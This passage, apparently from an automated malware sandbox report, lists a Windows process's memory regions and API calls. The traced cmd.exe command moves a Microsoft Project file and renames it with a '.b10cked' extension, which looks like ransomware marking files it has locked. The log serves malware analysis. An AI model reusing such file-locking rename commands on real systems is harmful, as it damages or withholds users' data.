"c:\\windows\\system32\\kernel32.dll") Region: id = 30206 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30207 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30208 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30209 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30210 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30211 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 30212 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30213 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30214 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30215 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30216 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30217 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30218 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 30219 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 30220 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 30271 start_va = 0x1300000 end_va = 0x13bffff entry_point = 0x1300000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 679 os_tid = 0xa48 [0204.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd7c | out: lpSystemTimeAsFileTime=0x18fd7c*(dwLowDateTime=0xae99ba60, dwHighDateTime=0x1d440a9)) [0204.333] GetCurrentProcessId () returned 0xa14 [0204.333] GetCurrentThreadId () returned 0xa48 [0204.333] GetTickCount () returned 0x39980 [0204.333] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd74 | out: lpPerformanceCount=0x18fd74*=26112262704) returned 1 [0204.334] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.334] __set_app_type (_Type=0x1) [0204.334] __p__fmode () returned 0x76b331f4 [0204.334] __p__commode () returned 0x76b331fc [0204.334] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.334] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.334] GetCurrentThreadId () returned 0xa48 [0204.334] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa48) returned 0x38 [0204.334] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.335] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.335] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.335] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.335] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd0c | out: phkResult=0x18fd0c*=0x0) returned 0x2 [0204.335] VirtualQuery (in: lpAddress=0x18fd43, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.335] GetConsoleOutputCP () returned 0x1b5 [0204.335] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.335] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.335] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.335] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.336] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.336] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.336] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.336] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.336] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.336] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.336] GetEnvironmentStringsW () returned 0x330180* [0204.337] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0204.337] GetEnvironmentStringsW () returned 0x330180* [0204.337] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0204.337] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec7c | out: phkResult=0x18ec7c*=0x40) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0xa8, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x0, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegCloseKey (hKey=0x40) returned 0x0 [0204.337] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec7c | out: phkResult=0x18ec7c*=0x40) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x0, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x9, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x9, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x9, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegCloseKey (hKey=0x40) returned 0x0 [0204.338] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.338] srand (_Seed=0x5b8863a6) [0204.338] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"" [0204.338] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"" [0204.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.338] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.338] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.338] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.338] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.338] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.338] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.338] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.339] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.339] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.339] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.339] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.339] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.339] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.339] GetEnvironmentStringsW () returned 0x3322d0* [0204.339] FreeEnvironmentStringsW (penv=0x3322d0) returned 1 [0204.339] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.339] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.339] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.339] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.339] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.339] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.339] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.339] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.339] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.339] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.339] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.339] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa48, lpFilePart=0x18fa44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa44*="Desktop") returned 0x18 [0204.339] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.339] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f7c4 | out: lpFindFileData=0x18f7c4) returned 0x330010 [0204.340] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0204.340] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f7c4 | out: lpFindFileData=0x18f7c4) returned 0x330010 [0204.340] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0204.340] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f7c4 | out: lpFindFileData=0x18f7c4) returned 0x330010 [0204.340] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0204.340] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.340] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.340] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.340] GetEnvironmentStringsW () returned 0x332af0* [0204.340] FreeEnvironmentStringsW (penv=0x332af0) returned 1 [0204.340] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.341] GetConsoleOutputCP () returned 0x1b5 [0204.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.341] GetUserDefaultLCID () returned 0x409 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb88, cchData=128 | out: lpLCData="0") returned 2 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb88, cchData=128 | out: lpLCData="0") returned 2 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb88, cchData=128 | out: lpLCData="1") returned 2 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.342] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.343] GetConsoleTitleW (in: lpConsoleTitle=0x3208e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.343] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.343] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.343] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.343] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.344] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.344] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.344] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.344] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.344] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.344] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.344] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.346] GetConsoleTitleW (in: lpConsoleTitle=0x18f880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.347] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.347] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.347] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.347] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.347] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.347] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.347] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.347] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.347] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.347] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.347] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.347] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.347] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.347] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.349] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f63c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f634, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f634*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.350] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.350] _wcsicmp (_String1="MSWINP~1.HXN", _String2=".") returned 63 [0204.350] _wcsicmp (_String1="MSWINP~1.HXN", _String2="..") returned 63 [0204.350] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~1.hxn")) returned 0x2022 [0204.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.351] SetErrorMode (uMode=0x0) returned 0x0 [0204.351] SetErrorMode (uMode=0x1) returned 0x0 [0204.351] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", nBufferLength=0x104, lpBuffer=0x18efc4, lpFilePart=0x18efac | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", lpFilePart=0x18efac*="MSWINP~1.HXN") returned 0x27 [0204.351] SetErrorMode (uMode=0x0) returned 0x1 [0204.351] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.351] _wcsicmp (_String1="MSWINP~1.HXN", _String2=".") returned 63 [0204.351] _wcsicmp (_String1="MSWINP~1.HXN", _String2="..") returned 63 [0204.351] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~1.hxn")) returned 0x2022 [0204.351] SetErrorMode (uMode=0x0) returned 0x0 [0204.351] SetErrorMode (uMode=0x1) returned 0x0 [0204.351] GetFullPathNameW (in: 